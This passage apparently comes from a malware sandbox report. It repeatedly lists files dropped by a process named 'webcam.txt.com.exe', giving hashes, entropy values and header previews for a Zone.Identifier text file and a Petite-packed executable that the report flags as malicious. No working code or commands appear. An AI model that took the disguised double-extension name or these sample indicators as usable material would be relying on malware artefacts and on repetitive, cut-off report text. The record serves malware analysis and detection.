                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
